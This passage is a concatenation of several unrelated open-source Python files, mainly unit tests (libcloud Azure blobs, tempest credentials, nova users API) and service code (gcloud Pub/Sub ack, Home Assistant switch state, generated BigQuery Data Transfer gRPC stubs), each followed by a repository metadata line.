                                                   iterator=iterator,
                                                   extra=extra,
                                                   ex_blob_type='BlockBlob',
                                                   ex_use_lease=True)

        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, 3)
        self.mock_response_klass.use_param = None

    def test_upload_page_object_via_stream(self):
        self.mock_response_klass.use_param = 'comp'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)

        object_name = 'foo_test_upload'
        blob_size = AZURE_PAGE_CHUNK_SIZE
        iterator = BytesIO(b('1' * blob_size))
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra,
                                                   ex_blob_type='PageBlob',
                                                   ex_page_blob_size=blob_size)

        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, blob_size)
        self.mock_response_klass.use_param = None

    def test_upload_page_object_via_stream_with_lease(self):
        self.mock_response_klass.use_param = 'comp'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)

        object_name = 'foo_test_upload'
        blob_size = AZURE_PAGE_CHUNK_SIZE
        iterator = BytesIO(b('1' * blob_size))
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra,
                                                   ex_blob_type='PageBlob',
                                                   ex_page_blob_size=blob_size,
                                                   ex_use_lease=True)

        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, blob_size)

    def test_delete_object_not_found(self):
        self.mock_response_klass.type = 'NOT_FOUND'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
                     meta_data=None, container=container, driver=self.driver)
        try:
            self.driver.delete_object(obj=obj)
        except ObjectDoesNotExistError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_delete_object_success(self):
        self.mock_response_klass.type = 'DELETE'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
                     meta_data=None, container=container, driver=self.driver)

        result = self.driver.delete_object(obj=obj)
        self.assertTrue(result)

    def test_storage_driver_host(self):
        # Non regression tests for issue LIBCLOUD-399 dealing with the bad
        # management of the connectionCls.host class attribute
        driver1 = self.driver_type('fakeaccount1', 'deadbeafcafebabe==')
        driver2 = self.driver_type('fakeaccount2', 'deadbeafcafebabe==')
        driver3 = self.driver_type('fakeaccount3', 'deadbeafcafebabe==',
                                   host='test.foo.bar.com')

        host1 = driver1.connection.host
        host2 = driver2.connection.host
        host3 = driver3.connection.host

        self.assertEqual(host1, 'fakeaccount1.blob.core.windows.net')
        self.assertEqual(host2, 'fakeaccount2.blob.core.windows.net')
        self.assertEqual(host3, 'test.foo.bar.com')
if __name__ == '__main__':
    # Allow running this test module directly; propagate unittest's result
    # as the process exit status.
    sys.exit(unittest.main())
| pquentin/libcloud | libcloud/test/storage/test_azure_blobs.py | Python | apache-2.0 | 38,350 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub topics publish command."""
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.pubsub import util
class Ack(base.Command):
    """Acknowledges one or more messages on the specified subscription.

    Acknowledges one or more messages as having been successfully received.
    If a delivered message is not acknowledged, Cloud Pub/Sub will attempt to
    deliver it again.
    """

    @staticmethod
    def Args(parser):
        """Register flags for this command."""
        parser.add_argument(
            'subscription', help='Subscription name to ACK messages on.')
        parser.add_argument(
            'ackid', nargs='+', help='One or more AckId to acknowledge.')

    def Collection(self):
        """Return the resource collection used to format this command's output."""
        return util.SUBSCRIPTIONS_ACK_COLLECTION

    def Run(self, args):
        """Acknowledge the requested ack IDs on the given subscription.

        Args:
          args: an argparse namespace. All the arguments that were provided to
              this command invocation (``subscription`` and ``ackid``).

        Returns:
          Ack display dictionary with information about the acknowledged
          messages and related subscription.
        """
        messages = self.context['pubsub_msgs']
        client = self.context['pubsub']

        request = messages.PubsubProjectsSubscriptionsAcknowledgeRequest(
            acknowledgeRequest=messages.AcknowledgeRequest(ackIds=args.ackid),
            subscription=util.SubscriptionFormat(args.subscription))
        client.projects_subscriptions.Acknowledge(request)

        # A plain dict (instead of the request object itself) keeps the
        # displayed field names consistent (``subscriptionId``).
        return {'subscriptionId': request.subscription,
                'ackIds': request.acknowledgeRequest.ackIds}
| KaranToor/MA450 | google-cloud-sdk/lib/surface/pubsub/subscriptions/ack.py | Python | apache-2.0 | 2,299 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import FeedItemSetLinkServiceClient
# Explicit public API of this package: only the generated client class.
__all__ = ("FeedItemSetLinkServiceClient",)
| googleads/google-ads-python | google/ads/googleads/v9/services/services/feed_item_set_link_service/__init__.py | Python | apache-2.0 | 694 |
# Copyright 2016 Hewlett Packard Enterprise Development LP
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from tempest.lib.common import cred_client
from tempest.tests import base
class TestCredClientV2(base.TestCase):
    """Tests for the Keystone v2 credentials client wrapper."""

    def setUp(self):
        super(TestCredClientV2, self).setUp()
        # Stand-in service clients; V2CredsClient simply forwards calls.
        self.identity_client = mock.MagicMock()
        self.projects_client = mock.MagicMock()
        self.users_client = mock.MagicMock()
        self.roles_client = mock.MagicMock()
        self.creds_client = cred_client.V2CredsClient(
            self.identity_client, self.projects_client,
            self.users_client, self.roles_client)

    def test_create_project(self):
        self.projects_client.create_tenant.return_value = {'tenant': 'a_tenant'}
        created = self.creds_client.create_project('fake_name', 'desc')
        self.assertEqual('a_tenant', created)
        self.projects_client.create_tenant.assert_called_once_with(
            name='fake_name', description='desc')

    def test_delete_project(self):
        self.creds_client.delete_project('fake_id')
        self.projects_client.delete_tenant.assert_called_once_with('fake_id')
class TestCredClientV3(base.TestCase):
    """Tests for the Keystone v3 credentials client wrapper."""

    def setUp(self):
        super(TestCredClientV3, self).setUp()
        self.identity_client = mock.MagicMock()
        self.projects_client = mock.MagicMock()
        self.users_client = mock.MagicMock()
        self.roles_client = mock.MagicMock()
        self.domains_client = mock.MagicMock()
        # V3CredsClient resolves its domain id at construction time.
        self.domains_client.list_domains.return_value = {
            'domains': [{'id': 'fake_domain_id'}]
        }
        self.creds_client = cred_client.V3CredsClient(
            self.identity_client, self.projects_client, self.users_client,
            self.roles_client, self.domains_client, 'fake_domain')

    def test_create_project(self):
        self.projects_client.create_project.return_value = {
            'project': 'a_tenant'
        }
        created = self.creds_client.create_project('fake_name', 'desc')
        self.assertEqual('a_tenant', created)
        self.projects_client.create_project.assert_called_once_with(
            name='fake_name', description='desc', domain_id='fake_domain_id')

    def test_delete_project(self):
        self.creds_client.delete_project('fake_id')
        self.projects_client.delete_project.assert_called_once_with('fake_id')
| Juniper/tempest | tempest/tests/lib/common/test_cred_client.py | Python | apache-2.0 | 3,309 |
"""Reproduce an Switch state."""
import asyncio
import logging
from typing import Iterable, Optional
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import Context, State
from homeassistant.helpers.typing import HomeAssistantType
from . import DOMAIN
_LOGGER = logging.getLogger(__name__)

# A switch entity can only be reproduced into one of these two states.
VALID_STATES = {STATE_ON, STATE_OFF}
async def _async_reproduce_state(
    hass: HomeAssistantType, state: State, context: Optional[Context] = None
) -> None:
    """Reproduce a single state."""
    cur_state = hass.states.get(state.entity_id)

    if cur_state is None:
        _LOGGER.warning("Unable to find entity %s", state.entity_id)
        return

    if state.state not in VALID_STATES:
        _LOGGER.warning(
            "Invalid state specified for %s: %s", state.entity_id, state.state
        )
        return

    # Nothing to do if the entity is already in the requested state.
    if cur_state.state == state.state:
        return

    # Guarded by the VALID_STATES check above, so this is exhaustive.
    service = SERVICE_TURN_ON if state.state == STATE_ON else SERVICE_TURN_OFF
    await hass.services.async_call(
        DOMAIN,
        service,
        {ATTR_ENTITY_ID: state.entity_id},
        context=context,
        blocking=True,
    )
async def async_reproduce_states(
    hass: HomeAssistantType, states: Iterable[State], context: Optional[Context] = None
) -> None:
    """Reproduce Switch states."""
    # Reproduce every requested state concurrently.
    tasks = [_async_reproduce_state(hass, state, context) for state in states]
    await asyncio.gather(*tasks)
| leppa/home-assistant | homeassistant/components/switch/reproduce_state.py | Python | apache-2.0 | 1,612 |
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack.compute.contrib import users
from nova.auth.manager import User, Project
from nova import test
from nova.tests.api.openstack import fakes
from nova import utils
def fake_init(self):
    """Replacement Controller.__init__ that wires in the fake auth manager."""
    self.manager = fakes.FakeAuthManager()
class UsersTest(test.TestCase):
    """Tests for the legacy nova-auth users API controller."""

    def setUp(self):
        super(UsersTest, self).setUp()
        self.flags(verbose=True)
        # Swap in fake_init so the controller talks to FakeAuthManager.
        self.stubs.Set(users.Controller, '__init__',
                       fake_init)

        fakes.FakeAuthManager.clear_fakes()
        fakes.FakeAuthManager.projects = dict(testacct=Project('testacct',
                                                               'testacct',
                                                               'id1',
                                                               'test',
                                                               []))
        fakes.FakeAuthDatabase.data = {}

        fakes.stub_out_networking(self.stubs)
        fakes.stub_out_rate_limiting(self.stubs)
        fakes.stub_out_auth(self.stubs)

        # Seed two users: one regular, one admin.
        fakemgr = fakes.FakeAuthManager()
        fakemgr.add_user(User('id1', 'guy1', 'acc1', 'secret1', False))
        fakemgr.add_user(User('id2', 'guy2', 'acc2', 'secret2', True))

        self.controller = users.Controller()

    def test_get_user_list(self):
        req = fakes.HTTPRequest.blank('/v2/fake/users')
        res_dict = self.controller.index(req)
        self.assertEqual(len(res_dict['users']), 2)

    def test_get_user_by_id(self):
        req = fakes.HTTPRequest.blank('/v2/fake/users/id2')
        res_dict = self.controller.show(req, 'id2')

        self.assertEqual(res_dict['user']['id'], 'id2')
        self.assertEqual(res_dict['user']['name'], 'guy2')
        self.assertEqual(res_dict['user']['secret'], 'secret2')
        self.assertEqual(res_dict['user']['admin'], True)

    def test_user_delete(self):
        req = fakes.HTTPRequest.blank('/v2/fake/users/id1')
        self.controller.delete(req, 'id1')

        self.assertTrue('id1' not in [u.id for u in
                                      fakes.FakeAuthManager.auth_data])

    def test_user_create(self):
        secret = utils.generate_password()
        body = dict(user=dict(name='test_guy',
                              access='acc3',
                              secret=secret,
                              admin=True))
        req = fakes.HTTPRequest.blank('/v2/fake/users')
        res_dict = self.controller.create(req, body)

        # NOTE(justinsb): This is a questionable assertion in general
        # fake sets id=name, but others might not...
        self.assertEqual(res_dict['user']['id'], 'test_guy')

        self.assertEqual(res_dict['user']['name'], 'test_guy')
        self.assertEqual(res_dict['user']['access'], 'acc3')
        self.assertEqual(res_dict['user']['secret'], secret)
        self.assertEqual(res_dict['user']['admin'], True)
        self.assertTrue('test_guy' in [u.id for u in
                                       fakes.FakeAuthManager.auth_data])
        # Two seeded users plus the newly created one.
        self.assertEqual(len(fakes.FakeAuthManager.auth_data), 3)

    def test_user_update(self):
        new_secret = utils.generate_password()
        body = dict(user=dict(name='guy2',
                              access='acc2',
                              secret=new_secret))

        req = fakes.HTTPRequest.blank('/v2/fake/users/id2')
        res_dict = self.controller.update(req, 'id2', body)

        self.assertEqual(res_dict['user']['id'], 'id2')
        self.assertEqual(res_dict['user']['name'], 'guy2')
        self.assertEqual(res_dict['user']['access'], 'acc2')
        self.assertEqual(res_dict['user']['secret'], new_secret)
        self.assertEqual(res_dict['user']['admin'], True)
class TestUsersXMLSerializer(test.TestCase):
    """Verify the XML templates used by the users extension."""

    def test_index(self):
        serializer = users.UsersTemplate()
        fixture = {'users': [{'id': 'id1',
                              'name': 'guy1',
                              'secret': 'secret1',
                              'admin': False},
                             {'id': 'id2',
                              'name': 'guy2',
                              'secret': 'secret2',
                              'admin': True}]}

        tree = etree.XML(serializer.serialize(fixture))
        self.assertEqual(tree.tag, 'users')
        self.assertEqual(len(tree), 2)
        for index, user_id in enumerate(('id1', 'id2')):
            self.assertEqual(tree[index].tag, 'user')
            self.assertEqual(tree[index].get('id'), user_id)

    def test_show(self):
        serializer = users.UserTemplate()
        fixture = {'user': {'id': 'id2',
                            'name': 'guy2',
                            'secret': 'secret2',
                            'admin': True}}

        tree = etree.XML(serializer.serialize(fixture))
        self.assertEqual(tree.tag, 'user')
        for attr, expected in (('id', 'id2'),
                               ('name', 'guy2'),
                               ('secret', 'secret2'),
                               ('admin', 'True')):
            self.assertEqual(tree.get(attr), expected)
| rcbops/nova-buildpackage | nova/tests/api/openstack/compute/contrib/test_users.py | Python | apache-2.0 | 5,843 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.bigquery_datatransfer_v1.proto import datatransfer_pb2 as google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2
from google.cloud.bigquery_datatransfer_v1.proto import transfer_pb2 as google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class DataTransferServiceStub(object):
    """The Google BigQuery Data Transfer Service API enables BigQuery users to
    configure the transfer of their data from other Google Products into BigQuery.
    This service contains methods that are end user exposed. It backs up the
    frontend.
    """

    # NOTE(review): this module is emitted by the gRPC protocol compiler
    # ("DO NOT EDIT" header). Keep hand changes to comments only and
    # regenerate from the .proto for anything substantive.

    def __init__(self, channel):
        """Constructor.

        Args:
          channel: A grpc.Channel.
        """
        # Every attribute below is a callable unary-unary RPC, bound to its
        # fully-qualified method name with the generated protobuf request
        # serializer and response deserializer.
        self.GetDataSource = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetDataSource',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetDataSourceRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DataSource.FromString,
        )
        self.ListDataSources = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListDataSources',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesResponse.FromString,
        )
        self.CreateTransferConfig = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/CreateTransferConfig',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CreateTransferConfigRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
        )
        self.UpdateTransferConfig = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/UpdateTransferConfig',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.UpdateTransferConfigRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
        )
        # Delete RPCs return google.protobuf.Empty.
        self.DeleteTransferConfig = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/DeleteTransferConfig',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferConfigRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.GetTransferConfig = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetTransferConfig',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferConfigRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
        )
        self.ListTransferConfigs = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferConfigs',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsResponse.FromString,
        )
        self.ScheduleTransferRuns = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/ScheduleTransferRuns',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsResponse.FromString,
        )
        self.GetTransferRun = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetTransferRun',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferRunRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferRun.FromString,
        )
        self.DeleteTransferRun = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/DeleteTransferRun',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferRunRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.ListTransferRuns = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferRuns',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsResponse.FromString,
        )
        self.ListTransferLogs = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferLogs',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsResponse.FromString,
        )
        self.CheckValidCreds = channel.unary_unary(
            '/google.cloud.bigquery.datatransfer.v1.DataTransferService/CheckValidCreds',
            request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsResponse.FromString,
        )
class DataTransferServiceServicer(object):
    """The Google BigQuery Data Transfer Service API enables BigQuery users to
    configure the transfer of their data from other Google Products into BigQuery.
    This service contains methods that are end user exposed. It backs up the
    frontend.
    """

    # NOTE(review): generated base class ("DO NOT EDIT" header). Subclasses
    # override the methods below; every default implementation answers
    # UNIMPLEMENTED and raises, so an unimplemented RPC fails loudly on both
    # the server and client side.

    def GetDataSource(self, request, context):
        """Retrieves a supported data source and returns its settings,
        which can be used for UI rendering.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListDataSources(self, request, context):
        """Lists supported data sources and returns their settings,
        which can be used for UI rendering.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CreateTransferConfig(self, request, context):
        """Creates a new data transfer configuration.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateTransferConfig(self, request, context):
        """Updates a data transfer configuration.
        All fields must be set, even if they are not updated.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteTransferConfig(self, request, context):
        """Deletes a data transfer configuration,
        including any associated transfer runs and logs.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetTransferConfig(self, request, context):
        """Returns information about a data transfer config.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListTransferConfigs(self, request, context):
        """Returns information about all data transfers in the project.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ScheduleTransferRuns(self, request, context):
        """Creates transfer runs for a time range [start_time, end_time].
        For each date - or whatever granularity the data source supports - in the
        range, one transfer run is created.
        Note that runs are created per UTC time in the time range.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetTransferRun(self, request, context):
        """Returns information about the particular transfer run.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteTransferRun(self, request, context):
        """Deletes the specified transfer run.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListTransferRuns(self, request, context):
        """Returns information about running and completed jobs.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListTransferLogs(self, request, context):
        """Returns user facing log messages for the data transfer run.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CheckValidCreds(self, request, context):
        """Returns true if valid credentials exist for the given data source and
        requesting user.
        Some data sources doesn't support service account, so we need to talk to
        them on behalf of the end user. This API just checks whether we have OAuth
        token for the particular user, which is a pre-requisite before user can
        create a transfer config.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_DataTransferServiceServicer_to_server(servicer, server):
    """Register `servicer`'s RPC handlers with a grpc `server`.

    Generated helper ("DO NOT EDIT" header): builds one unary-unary method
    handler per service RPC, mirroring the (de)serializers used by the stub,
    and installs them under the fully-qualified service name.
    """
    rpc_method_handlers = {
        'GetDataSource': grpc.unary_unary_rpc_method_handler(
            servicer.GetDataSource,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetDataSourceRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DataSource.SerializeToString,
        ),
        'ListDataSources': grpc.unary_unary_rpc_method_handler(
            servicer.ListDataSources,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesResponse.SerializeToString,
        ),
        'CreateTransferConfig': grpc.unary_unary_rpc_method_handler(
            servicer.CreateTransferConfig,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CreateTransferConfigRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
        ),
        'UpdateTransferConfig': grpc.unary_unary_rpc_method_handler(
            servicer.UpdateTransferConfig,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.UpdateTransferConfigRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
        ),
        'DeleteTransferConfig': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteTransferConfig,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferConfigRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        'GetTransferConfig': grpc.unary_unary_rpc_method_handler(
            servicer.GetTransferConfig,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferConfigRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
        ),
        'ListTransferConfigs': grpc.unary_unary_rpc_method_handler(
            servicer.ListTransferConfigs,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsResponse.SerializeToString,
        ),
        'ScheduleTransferRuns': grpc.unary_unary_rpc_method_handler(
            servicer.ScheduleTransferRuns,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsResponse.SerializeToString,
        ),
        'GetTransferRun': grpc.unary_unary_rpc_method_handler(
            servicer.GetTransferRun,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferRunRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferRun.SerializeToString,
        ),
        'DeleteTransferRun': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteTransferRun,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferRunRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        'ListTransferRuns': grpc.unary_unary_rpc_method_handler(
            servicer.ListTransferRuns,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsResponse.SerializeToString,
        ),
        'ListTransferLogs': grpc.unary_unary_rpc_method_handler(
            servicer.ListTransferLogs,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsResponse.SerializeToString,
        ),
        'CheckValidCreds': grpc.unary_unary_rpc_method_handler(
            servicer.CheckValidCreds,
            request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsRequest.FromString,
            response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'google.cloud.bigquery.datatransfer.v1.DataTransferService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
| jonparrott/google-cloud-python | bigquery_datatransfer/google/cloud/bigquery_datatransfer_v1/proto/datatransfer_pb2_grpc.py | Python | apache-2.0 | 16,649 |
# -*- coding: utf-8 -*-
import logging
import posixpath
from collections import defaultdict
from seaserv import seafile_api
from seahub.base.templatetags.seahub_tags import email2nickname, email2contact_email
from seahub.utils.timeutils import timestamp_to_isoformat_timestr
